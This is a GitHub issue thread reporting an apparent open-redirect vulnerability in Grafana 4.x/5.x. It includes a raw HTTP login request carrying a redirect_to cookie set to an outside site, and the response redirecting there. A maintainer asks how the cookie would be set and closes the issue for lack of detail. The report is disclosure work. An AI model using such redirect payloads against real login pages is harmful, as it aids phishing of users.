### ISSUE TITLE
URL redirect

### ISSUE THREAD

**Issue by Onethingxulong** [grafana/grafana#14612]
What Grafana version are you using? 
： 4.x、5.x
What OS are you running grafana on?  
：liunx
What did you do?
：URL redirection vulnerability, through the redirect_to construct URL redirect link script in the cookie, the user can successfully trigger the vulnerability after clicking the login button

POST /login HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://www.baidu.com
Content-Type: application/json;charset=utf-8
Content-Length: 47
Cookie: grafana_sess=d855d3800e56df82; 	redirect_to=https://www.baidu.com
Connection: close

{"user":"admin","email":"","password":"123456"}

HTTP/1.1 200 OK
Content-Type: application/json
Set-Cookie: grafana_user=admin; Path=/; Max-Age=604800
Set-Cookie: grafana_remember=0648ced0904fee8965e8541a47e84a02be1f54129f6c1d22931ec63eeb7ad1d25e; Path=/; Max-Age=604800
Set-Cookie: grafana_sess=ac3bcff2021bd489; Path=/; HttpOnly
Set-Cookie: redirect_to=; Path=/; Max-Age=0
Date: Thu, 20 Dec 2018 08:05:22 GMT
Content-Length: 61
Connection: close

{"message":"Logged in","redirectUrl":"https://www.baidu.com"}
 
Finally, I successfully jumped to the Baidu homepage to prove that the vulnerability exists.

**Comment by torkelo** [comment]
Can you explain how you set the redirect_to cookie ?

**Comment by torkelo** [comment]
closing this due to lack of further details
